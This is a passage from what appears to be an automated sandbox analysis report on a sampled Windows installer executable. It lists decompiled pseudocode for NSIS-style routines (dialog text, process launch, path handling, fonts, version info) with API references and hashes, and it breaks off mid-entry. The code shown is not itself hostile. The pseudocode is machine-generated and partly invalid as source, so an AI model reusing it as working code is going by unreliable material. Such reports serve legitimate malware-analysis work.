				void* _t27;

				_t25 = GetDlgItem( *(_t27 - 0x34), __edx);
				GetClientRect(_t25, _t27 - 0x40);
				_t17 = SendMessageA(_t25, 0x172, _t21, LoadImageA(_t21, E004029F6(_t21), _t21,  *(_t27 - 0x38) *  *(_t27 - 0x1c),  *(_t27 - 0x34) *  *(_t27 - 0x1c), 0x10));
				if(_t17 != _t21) {
					DeleteObject(_t17);
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t27 - 4));
				return 0;
			}







                                                                                                                0x00401ccb
                                                                                                                0x00401cd2
                                                                                                                0x00401d01
                                                                                                                0x00401d09
                                                                                                                0x00401d10
                                                                                                                0x00401d10
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • GetDlgItem.USER32 ref: 00401CC5
                                                                                                                • GetClientRect.USER32 ref: 00401CD2
                                                                                                                • LoadImageA.USER32 ref: 00401CF3
                                                                                                                • SendMessageA.USER32(00000000,00000172,?,00000000), ref: 00401D01
                                                                                                                • DeleteObject.GDI32(00000000), ref: 00401D10
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ClientDeleteImageItemLoadMessageObjectRectSend
                                                                                                                • String ID:
                                                                                                                • API String ID: 1849352358-0
                                                                                                                • Opcode ID: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                                • Instruction ID: de7316f9b9f1bcc3f0c1dff9ae5dc63c91f1472c52c052d8cf8a0da7f27950be
                                                                                                                • Opcode Fuzzy Hash: 70cca8153c69b2e132429069c22b9ddf05dbb7ba62a9a7cfa9b79a9bcebcea9b
                                                                                                                • Instruction Fuzzy Hash: D5F01DB2E04105BFD700EFA4EE89DAFB7BDEB44345B104576F602F2190C6789D018B69
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004046F1, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E004046F1(int _a4, intOrPtr _a8, unsigned int _a12) {
				char _v36;
				char _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* _t26;
				void* _t34;
				signed int _t36;
				signed int _t39;
				unsigned int _t46;

				_t46 = _a12;
				_push(0x14);
				_pop(0);
				_t34 = 0xffffffdc;
				if(_t46 < 0x100000) {
					_push(0xa);
					_pop(0);
					_t34 = 0xffffffdd;
				}
				if(_t46 < 0x400) {
					_t34 = 0xffffffde;
				}
				if(_t46 < 0xffff3333) {
					_t39 = 0x14;
					asm("cdq");
					_t46 = _t46 + 1 / _t39;
				}
				_push(E00405B88(_t34, 0, _t46,  &_v36, 0xffffffdf));
				_push(E00405B88(_t34, 0, _t46,  &_v68, _t34));
				_t21 = _t46 & 0x00ffffff;
				_t36 = 0xa;
				_push(((_t46 & 0x00ffffff) + _t21 * 4 + (_t46 & 0x00ffffff) + _t21 * 4 >> 0) % _t36);
				_push(_t46 >> 0);
				_t26 = E00405B88(_t34, 0, 0x4204a0, 0x4204a0, _a8);
				wsprintfA(_t26 + lstrlenA(0x4204a0), "%u.%u%s%s");
				return SetDlgItemTextA( *0x423678, _a4, 0x4204a0);
			}













                                                                                                                0x004046f9
                                                                                                                0x004046fd
                                                                                                                0x00404705
                                                                                                                0x00404708
                                                                                                                0x00404709
                                                                                                                0x0040470b
                                                                                                                0x0040470d
                                                                                                                0x00404710
                                                                                                                0x00404710
                                                                                                                0x00404717
                                                                                                                0x0040471d
                                                                                                                0x0040471d
                                                                                                                0x00404724
                                                                                                                0x0040472f
                                                                                                                0x00404730
                                                                                                                0x00404733
                                                                                                                0x00404733
                                                                                                                0x00404740
                                                                                                                0x0040474b
                                                                                                                0x0040474e
                                                                                                                0x00404760
                                                                                                                0x00404767
                                                                                                                0x00404768
                                                                                                                0x00404777
                                                                                                                0x00404787
                                                                                                                0x004047a3

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(004204A0,004204A0,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404611,000000DF,0000040F,00000400,00000000), ref: 0040477F
                                                                                                                • wsprintfA.USER32 ref: 00404787
                                                                                                                • SetDlgItemTextA.USER32 ref: 0040479A
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ItemTextlstrlenwsprintf
                                                                                                                • String ID: %u.%u%s%s
                                                                                                                • API String ID: 3540041739-3551169577
                                                                                                                • Opcode ID: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                                • Instruction ID: e1128f73888b2767c9277aed1687fd20c93e739cc52df1aac9c0a45a5a8dde9d
                                                                                                                • Opcode Fuzzy Hash: 900e3a4788bbcdb5831f4eb4ea085b1ecc54347093cfae2cf180548b061950ae
                                                                                                                • Instruction Fuzzy Hash: 7311E2736001243BDB10666D9C46EEF3699DBC6335F14423BFA25F61D1E938AC5286A8
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401BAD, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76windowtimeCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 51%
                                                                                                                			E00401BAD() {
				signed int _t28;
				CHAR* _t31;
				long _t32;
				int _t37;
				signed int _t38;
				int _t42;
				int _t48;
				struct HWND__* _t52;
				void* _t55;

				 *(_t55 - 0x34) = E004029D9(3);
				 *(_t55 + 8) = E004029D9(4);
				if(( *(_t55 - 0x10) & 0x00000001) != 0) {
					 *((intOrPtr*)(__ebp - 0x34)) = E004029F6(0x33);
				}
				__eflags =  *(_t55 - 0x10) & 0x00000002;
				if(( *(_t55 - 0x10) & 0x00000002) != 0) {
					 *(_t55 + 8) = E004029F6(0x44);
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x28)) - 0x21;
				_push(1);
				if(__eflags != 0) {
					_t50 = E004029F6();
					_t28 = E004029F6();
					asm("sbb ecx, ecx");
					asm("sbb eax, eax");
					_t31 =  ~( *_t27) & _t50;
					__eflags = _t31;
					_t32 = FindWindowExA( *(_t55 - 0x34),  *(_t55 + 8), _t31,  ~( *_t28) & _t28);
					goto L10;
				} else {
					_t52 = E004029D9();
					_t37 = E004029D9();
					_t48 =  *(_t55 - 0x10) >> 2;
					if(__eflags == 0) {
						_t32 = SendMessageA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8));
						L10:
						 *(_t55 - 8) = _t32;
					} else {
						_t38 = SendMessageTimeoutA(_t52, _t37,  *(_t55 - 0x34),  *(_t55 + 8), _t42, _t48, _t55 - 8);
						asm("sbb eax, eax");
						 *((intOrPtr*)(_t55 - 4)) =  ~_t38 + 1;
					}
				}
				__eflags =  *((intOrPtr*)(_t55 - 0x24)) - _t42;
				if( *((intOrPtr*)(_t55 - 0x24)) >= _t42) {
					_push( *(_t55 - 8));
					E00405AC4();
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t55 - 4));
				return 0;
			}












                                                                                                                0x00401bb6
                                                                                                                0x00401bc2
                                                                                                                0x00401bc5
                                                                                                                0x00401bce
                                                                                                                0x00401bce
                                                                                                                0x00401bd1
                                                                                                                0x00401bd5
                                                                                                                0x00401bde
                                                                                                                0x00401bde
                                                                                                                0x00401be1
                                                                                                                0x00401be5
                                                                                                                0x00401be7
                                                                                                                0x00401c34
                                                                                                                0x00401c36
                                                                                                                0x00401c3f
                                                                                                                0x00401c47
                                                                                                                0x00401c4a
                                                                                                                0x00401c4a
                                                                                                                0x00401c53
                                                                                                                0x00000000
                                                                                                                0x00401be9
                                                                                                                0x00401bf0
                                                                                                                0x00401bf2
                                                                                                                0x00401bfa
                                                                                                                0x00401bfd
                                                                                                                0x00401c25
                                                                                                                0x00401c59
                                                                                                                0x00401c59
                                                                                                                0x00401bff
                                                                                                                0x00401c0d
                                                                                                                0x00401c15
                                                                                                                0x00401c18
                                                                                                                0x00401c18
                                                                                                                0x00401bfd
                                                                                                                0x00401c5c
                                                                                                                0x00401c5f
                                                                                                                0x00401c65
                                                                                                                0x00402833
                                                                                                                0x00402833
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • SendMessageTimeoutA.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401C0D
                                                                                                                • SendMessageA.USER32(00000000,00000000,?,?), ref: 00401C25
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: MessageSend$Timeout
                                                                                                                • String ID: !
                                                                                                                • API String ID: 1777923405-2657877971
                                                                                                                • Opcode ID: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                • Instruction ID: 67abd366a37910a3fb0c7fe19d632a25016d3899897cc5a5bd850e91adcb6683
                                                                                                                • Opcode Fuzzy Hash: 4c88f05d798f5705ce1e1e18451d2fcf653d7f56610e9d44bad61831beeb824c
                                                                                                                • Instruction Fuzzy Hash: B721C4B1A44209BFEF01AFB4CE4AAAE7B75EF44344F14053EF602B60D1D6B84980E718
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 004053C6, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 24processCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E004053C6(CHAR* _a4) {
				struct _PROCESS_INFORMATION _v20;
				int _t7;

				0x4224a8->cb = 0x44;
				_t7 = CreateProcessA(0, _a4, 0, 0, 0, 0, 0, 0, 0x4224a8,  &_v20);
				if(_t7 != 0) {
					CloseHandle(_v20.hThread);
					return _v20.hProcess;
				}
				return _t7;
			}





                                                                                                                0x004053cf
                                                                                                                0x004053eb
                                                                                                                0x004053f3
                                                                                                                0x004053f8
                                                                                                                0x00000000
                                                                                                                0x004053fe
                                                                                                                0x00405402

                                                                                                                APIs
                                                                                                                • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,004224A8,Error launching installer), ref: 004053EB
                                                                                                                • CloseHandle.KERNEL32(?), ref: 004053F8
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 004053C6
                                                                                                                • Error launching installer, xrefs: 004053D9
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateHandleProcess
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\$Error launching installer
                                                                                                                • API String ID: 3712363035-2984075973
                                                                                                                • Opcode ID: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                • Instruction ID: 069b69ca15cd8b990da55ccc95fe3be7356009797bdfa18ab8f6d6c8c96e71ef
                                                                                                                • Opcode Fuzzy Hash: 3b814a6f076d0ba9038e170a1e0f3647fdefee354992cb10a65e7e77ca0a2381
                                                                                                                • Instruction Fuzzy Hash: A3E0ECB4A00219BFDB00AF64ED49AAB7BBDEB00305F90C522A911E2150D775D8118AB9
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00405659, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 16stringCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00405659(CHAR* _a4) {
				CHAR* _t7;

				_t7 = _a4;
				if( *(CharPrevA(_t7,  &(_t7[lstrlenA(_t7)]))) != 0x5c) {
					lstrcatA(_t7, 0x409010);
				}
				return _t7;
			}




                                                                                                                0x0040565a
                                                                                                                0x00405671
                                                                                                                0x00405679
                                                                                                                0x00405679
                                                                                                                0x00405681

                                                                                                                APIs
                                                                                                                • lstrlenA.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 0040565F
                                                                                                                • CharPrevA.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,00403226,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,00403386), ref: 00405668
                                                                                                                • lstrcatA.KERNEL32(?,00409010), ref: 00405679
                                                                                                                Strings
                                                                                                                • C:\Users\user\AppData\Local\Temp\, xrefs: 00405659
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CharPrevlstrcatlstrlen
                                                                                                                • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 2659869361-3916508600
                                                                                                                • Opcode ID: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                • Instruction ID: d5422d5486d5b384c4dcc02911800b35c31fcf4388d9dde419d5dff5703c7688
                                                                                                                • Opcode Fuzzy Hash: f17b2ccdaa8efd10834e0f4341d4d5b977b2bb6e8559feba5c8cad9ccc1df0ef
                                                                                                                • Instruction Fuzzy Hash: 8BD05272605A202ED2022A258C05E9B7A28CF06311B044866B540B2292C6386D818AEE
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401EC5, Relevance: 6.1, APIs: 4, Instructions: 54memoryCOMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 85%
                                                                                                                			E00401EC5(char __ebx, char* __edi, char* __esi) {
				char* _t18;
				int _t19;
				void* _t30;

				_t18 = E004029F6(0xffffffee);
				 *(_t30 - 0x2c) = _t18;
				_t19 = GetFileVersionInfoSizeA(_t18, _t30 - 0x30);
				 *__esi = __ebx;
				 *(_t30 - 8) = _t19;
				 *__edi = __ebx;
				 *((intOrPtr*)(_t30 - 4)) = 1;
				if(_t19 != __ebx) {
					__eax = GlobalAlloc(0x40, __eax);
					 *(__ebp + 8) = __eax;
					if(__eax != __ebx) {
						if(__eax != 0) {
							__ebp - 0x44 = __ebp - 0x34;
							if(VerQueryValueA( *(__ebp + 8), 0x409010, __ebp - 0x34, __ebp - 0x44) != 0) {
								 *(__ebp - 0x34) = E00405AC4(__esi,  *((intOrPtr*)( *(__ebp - 0x34) + 8)));
								 *(__ebp - 0x34) = E00405AC4(__edi,  *((intOrPtr*)( *(__ebp - 0x34) + 0xc)));
								 *((intOrPtr*)(__ebp - 4)) = __ebx;
							}
						}
						_push( *(__ebp + 8));
						GlobalFree();
					}
				}
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t30 - 4));
				return 0;
			}






                                                                                                                0x00401ec7
                                                                                                                0x00401ecf
                                                                                                                0x00401ed4
                                                                                                                0x00401ed9
                                                                                                                0x00401edd
                                                                                                                0x00401ee0
                                                                                                                0x00401ee2
                                                                                                                0x00401ee9
                                                                                                                0x00401ef2
                                                                                                                0x00401efa
                                                                                                                0x00401efd
                                                                                                                0x00401f12
                                                                                                                0x00401f18
                                                                                                                0x00401f2b
                                                                                                                0x00401f34
                                                                                                                0x00401f40
                                                                                                                0x00401f45
                                                                                                                0x00401f45
                                                                                                                0x00401f2b
                                                                                                                0x00401f48
                                                                                                                0x00401b75
                                                                                                                0x00401b75
                                                                                                                0x00401efd
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • GetFileVersionInfoSizeA.VERSION(00000000,?,000000EE), ref: 00401ED4
                                                                                                                • GlobalAlloc.KERNEL32(00000040,00000000,00000000,?,000000EE), ref: 00401EF2
                                                                                                                • GetFileVersionInfoA.VERSION(?,?,?,00000000), ref: 00401F0B
                                                                                                                • VerQueryValueA.VERSION(?,00409010,?,?,?,?,?,00000000), ref: 00401F24
                                                                                                                  • Part of subcall function 00405AC4: wsprintfA.USER32 ref: 00405AD1
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: FileInfoVersion$AllocGlobalQuerySizeValuewsprintf
                                                                                                                • String ID:
                                                                                                                • API String ID: 1404258612-0
                                                                                                                • Opcode ID: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                • Instruction ID: 178fa6cf4330108057832d0c189c0e5a27020503733a18e797ef1cc5e9d7aef6
                                                                                                                • Opcode Fuzzy Hash: be50ba22476c795dccddfbd46c0b19e6aec7ed87346bdfd2eed6167faf837e67
                                                                                                                • Instruction Fuzzy Hash: 52113A71A00108BEDB01EFA5DD819AEBBB9EB48344B20853AF501F61E1D7389A54DB28
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00401D1B, Relevance: 6.0, APIs: 4, Instructions: 34COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 67%
                                                                                                                			E00401D1B() {
				void* __esi;
				int _t6;
				signed char _t11;
				struct HFONT__* _t14;
				void* _t18;
				void* _t24;
				void* _t26;
				void* _t28;

				_t6 = GetDeviceCaps(GetDC( *(_t28 - 0x34)), 0x5a);
				0x40af74->lfHeight =  ~(MulDiv(E004029D9(2), _t6, 0x48));
				 *0x40af84 = E004029D9(3);
				_t11 =  *((intOrPtr*)(_t28 - 0x14));
				 *0x40af8b = 1;
				 *0x40af88 = _t11 & 0x00000001;
				 *0x40af89 = _t11 & 0x00000002;
				 *0x40af8a = _t11 & 0x00000004;
				E00405B88(_t18, _t24, _t26, 0x40af90,  *((intOrPtr*)(_t28 - 0x20)));
				_t14 = CreateFontIndirectA(0x40af74);
				_push(_t14);
				_push(_t26);
				E00405AC4();
				 *0x423f28 =  *0x423f28 +  *((intOrPtr*)(_t28 - 4));
				return 0;
			}











                                                                                                                0x00401d29
                                                                                                                0x00401d42
                                                                                                                0x00401d4c
                                                                                                                0x00401d51
                                                                                                                0x00401d5c
                                                                                                                0x00401d63
                                                                                                                0x00401d75
                                                                                                                0x00401d7b
                                                                                                                0x00401d80
                                                                                                                0x00401d8a
                                                                                                                0x004024b8
                                                                                                                0x00401561
                                                                                                                0x00402833
                                                                                                                0x0040288e
                                                                                                                0x0040289a

                                                                                                                APIs
                                                                                                                • GetDC.USER32(?), ref: 00401D22
                                                                                                                • GetDeviceCaps.GDI32(00000000), ref: 00401D29
                                                                                                                • MulDiv.KERNEL32(00000000,00000002,00000000), ref: 00401D38
                                                                                                                • CreateFontIndirectA.GDI32(0040AF74), ref: 00401D8A
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CapsCreateDeviceFontIndirect
                                                                                                                • String ID:
                                                                                                                • API String ID: 3272661963-0
                                                                                                                • Opcode ID: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                                • Instruction ID: d83410998d1654a5337f8c322709d39cf2ce3a8a4f0330bc6585c9693e616625
                                                                                                                • Opcode Fuzzy Hash: 2c6a9fd6684e48c72e8170f31dde3613139c4976fc228405473ba1f45ca6ba00
                                                                                                                • Instruction Fuzzy Hash: E1F044F1A45342AEE7016770AE0ABA93B649725306F100576F541BA1E2C5BC10149B7F
                                                                                                                Uniqueness

                                                                                                                Uniqueness Score: -1.00%

                                                                                                                Function 00403978, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 71COMMON
                                                                                                                Download Yara Rule
                                                                                                                C-Code - Quality: 100%
                                                                                                                			E00403978(void* __ecx, void* __eflags) {
				void* __ebx;
				void* __edi;
				void* __esi;
				signed short _t6;
				intOrPtr _t11;
				signed int _t13;
				signed int _t16;
				signed short* _t18;
				signed int _t20;
				signed short* _t23;
				intOrPtr _t25;
				signed int _t26;
				intOrPtr* _t27;

				_t24 = "1033";
				_t13 = 0xffff;
				_t6 = E00405ADD(__ecx, "1033");
				while(1) {
					_t26 =  *0x423ee4;
					if(_t26 == 0) {
						goto L7;
					}
					_t16 =  *( *0x423eb0 + 0x64);
					_t20 =  ~_t16;
					_t18 = _t16 * _t26 +  *0x423ee0;
					while(1) {
						_t18 = _t18 + _t20;
						_t26 = _t26 - 1;
						if((( *_t18 ^ _t6) & _t13) == 0) {
							break;
						}
						if(_t26 != 0) {
							continue;
						}
						goto L7;
					}
					 *0x423680 = _t18[1];
					 *0x423f48 = _t18[3];
					_t23 =  &(_t18[5]);
					if(_t23 != 0) {
						 *0x42367c = _t23;
						E00405AC4(_t24,  *_t18 & 0x0000ffff);
						SetWindowTextA( *0x420478, E00405B88(_t13, _t24, _t26, 0x4236a0, 0xfffffffe));
						_t11 =  *0x423ecc;
						_t27 =  *0x423ec8;
						if(_t11 == 0) {
							L15:
							return _t11;
						}
						_t25 = _t11;
						do {
							_t11 =  *_t27;
							if(_t11 != 0) {
								_t11 = E00405B88(_t13, _t25, _t27, _t27 + 0x18, _t11);
							}
							_t27 = _t27 + 0x418;
							_t25 = _t25 - 1;
						} while (_t25 != 0);
						goto L15;
					}
					L7:
					if(_t13 != 0xffff) {
						_t13 = 0;
					} else {
						_t13 = 0x3ff;
					}
				}
			}
















                                                                                                                0x0040397c
                                                                                                                0x00403981
                                                                                                                0x00403987
                                                                                                                0x0040398c
                                                                                                                0x0040398c
                                                                                                                0x00403994
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x0040399c
                                                                                                                0x004039a4
                                                                                                                0x004039a6
                                                                                                                0x004039ac
                                                                                                                0x004039ac
                                                                                                                0x004039ae
                                                                                                                0x004039ba
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004039be
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x00000000
                                                                                                                0x004039c0
                                                                                                                0x004039c5
                                                                                                                0x004039ce
                                                                                                                0x004039d4
                                                                                                                0x004039d9
                                                                                                                0x004039ed
                                                                                                                0x004039f8
                                                                                                                0x00403a10
                                                                                                                0x00403a16
                                                                                                                0x00403a1b
                                                                                                                0x00403a23
                                                                                                                0x00403a44
                                                                                                                0x00403a44
                                                                                                                0x00403a44
                                                                                                                0x00403a25
                                                                                                                0x00403a27
                                                                                                                0x00403a27
                                                                                                                0x00403a2b
                                                                                                                0x00403a32
                                                                                                                0x00403a32
                                                                                                                0x00403a37
                                                                                                                0x00403a3d
                                                                                                                0x00403a3d
                                                                                                                0x00000000
                                                                                                                0x00403a27
                                                                                                                0x004039db
                                                                                                                0x004039e0
                                                                                                                0x004039e9
                                                                                                                0x004039e2
                                                                                                                0x004039e2
                                                                                                                0x004039e2
                                                                                                                0x004039e0

                                                                                                                APIs
                                                                                                                • SetWindowTextA.USER32(00000000,004236A0), ref: 00403A10
                                                                                                                Strings
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 00000000.00000002.219309582.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                • Associated: 00000000.00000002.219264408.0000000000400000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219357679.0000000000407000.00000002.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219374293.0000000000409000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219440710.0000000000422000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219484587.0000000000429000.00000004.00020000.sdmp Download File
                                                                                                                • Associated: 00000000.00000002.219518020.000000000042C000.00000002.00020000.sdmp Download File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_0_2_400000_UGGJ4NnzFz.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: TextWindow
                                                                                                                • String ID: 1033$C:\Users\user\AppData\Local\Temp\
                                                                                                                • API String ID: 530164218-1075807775
                                                                                                                • Opcode ID: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
                                                                                                                • Instruction ID: 09623374405f0611f065d620c03919b516a5f167df25bc0d5edc66fe9dc562c0
                                                                                                                • Opcode Fuzzy Hash: defed7287a9455a29b24b67e45bb8aa9d1031aed7a359321573c6b72916d69ed
